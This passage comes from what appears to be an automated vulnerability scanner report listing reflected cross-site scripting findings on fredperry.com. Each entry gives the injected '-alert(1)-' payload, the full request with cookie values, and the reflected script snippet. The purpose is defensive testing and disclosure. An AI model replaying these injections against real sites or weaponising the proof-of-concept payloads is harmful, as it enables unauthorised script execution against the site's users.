Date: Tue, 09 Nov 2010 16:05:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r7of708qtgn1vt8bnn8uboqkk2; expires=Tue, 09-Nov-2010 17:05:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-editionb1808"-alert(1)-"761be49e7f3/men/");
//]]>
...[SNIP]...

1.80. http://www.fredperry.com/limited-edition/men/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 988e5"-alert(1)-"b11ab3c0675 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men988e5"-alert(1)-"b11ab3c0675/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:06:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hu1d1s8la6ui695fjj2imvb9n5; expires=Tue, 09-Nov-2010 17:06:13 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men988e5"-alert(1)-"b11ab3c0675/");
//]]>
...[SNIP]...

1.81. http://www.fredperry.com/limited-edition/men/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64480"-alert(1)-"2f0f4002ef1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/?64480"-alert(1)-"2f0f4002ef1=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ooj8qcigou1hp2bm63imobtkt0; expires=Tue, 09-Nov-2010 17:05:32 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's L
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/?64480"-alert(1)-"2f0f4002ef1=1");
//]]>
...[SNIP]...

1.82. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aebc"-alert(1)-"8415b8659b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition6aebc"-alert(1)-"8415b8659b8/men/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:13:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=t572mchn82lsgdjpraivc9hmj7; expires=Tue, 09-Nov-2010 17:13:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition6aebc"-alert(1)-"8415b8659b8/men/accessories/");
//]]>
...[SNIP]...

1.83. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1880"-alert(1)-"89b8cefdcb5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/menf1880"-alert(1)-"89b8cefdcb5/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l7gmp8pmt6tvlpnvuprf1qioh3; expires=Tue, 09-Nov-2010 17:14:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/menf1880"-alert(1)-"89b8cefdcb5/accessories/");
//]]>
...[SNIP]...

1.84. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bdf6"-alert(1)-"0c2e6e325d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/accessories7bdf6"-alert(1)-"0c2e6e325d1/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:14:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5ou6pdoglafg1dha16j5t94qk7; expires=Tue, 09-Nov-2010 17:14:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/accessories7bdf6"-alert(1)-"0c2e6e325d1/");
//]]>
...[SNIP]...

1.85. http://www.fredperry.com/limited-edition/men/accessories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af85e"-alert(1)-"f0ac6225e38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/accessories/?af85e"-alert(1)-"f0ac6225e38=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lphu3bnnj344ar3vk8j04vjlo7; expires=Tue, 09-Nov-2010 17:12:15 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/accessories/?af85e"-alert(1)-"f0ac6225e38=1");
//]]>
...[SNIP]...

1.86. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7520f"-alert(1)-"65db163a491 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition7520f"-alert(1)-"65db163a491/men/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=fba8t0ar5ln3ls253ccb9o12v2; expires=Tue, 09-Nov-2010 17:11:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition7520f"-alert(1)-"65db163a491/men/bags/");
//]]>
...[SNIP]...

1.87. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ca63"-alert(1)-"8f92cbce3aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men7ca63"-alert(1)-"8f92cbce3aa/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=28bt0rb15rjl4hvgp96soe7p70; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men7ca63"-alert(1)-"8f92cbce3aa/bags/");
//]]>
...[SNIP]...

1.88. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22869"-alert(1)-"2f8729c9de1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/bags22869"-alert(1)-"2f8729c9de1/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sc9er4klh7tb3b5pk845ru3dh5; expires=Tue, 09-Nov-2010 17:11:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/bags22869"-alert(1)-"2f8729c9de1/");
//]]>
...[SNIP]...

1.89. http://www.fredperry.com/limited-edition/men/bags/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccefc"-alert(1)-"09f5c581780 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/bags/?ccefc"-alert(1)-"09f5c581780=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:10:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rle2pg95m5vgh1oepgfpgeku56; expires=Tue, 09-Nov-2010 17:10:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men/bags/?ccefc"-alert(1)-"09f5c581780=1");
//]]>
...[SNIP]...

1.90. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87410"-alert(1)-"642ea0df71f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition87410"-alert(1)-"642ea0df71f/men/blank-canvas-stussy/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=65n5cjmvruquljc1oa0u0lpv05; expires=Tue, 09-Nov-2010 17:09:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition87410"-alert(1)-"642ea0df71f/men/blank-canvas-stussy/");
//]]>
...[SNIP]...

1.91. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bd9e"-alert(1)-"67a1afe9718 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men4bd9e"-alert(1)-"67a1afe9718/blank-canvas-stussy/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ge5scm29ad71fdltcr1kh3vfe2; expires=Tue, 09-Nov-2010 17:10:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/men4bd9e"-alert(1)-"67a1afe9718/blank-canvas-stussy/");
//]]>
...[SNIP]...

1.92. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2afe3"-alert(1)-"17e2dabd41a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/men/blank-canvas-stussy2afe3"-alert(1)-"17e2dabd41a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=eofi4cehnhrq7cjhic94pg8n24; expires=Tue, 09-Nov-2010 17:10:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
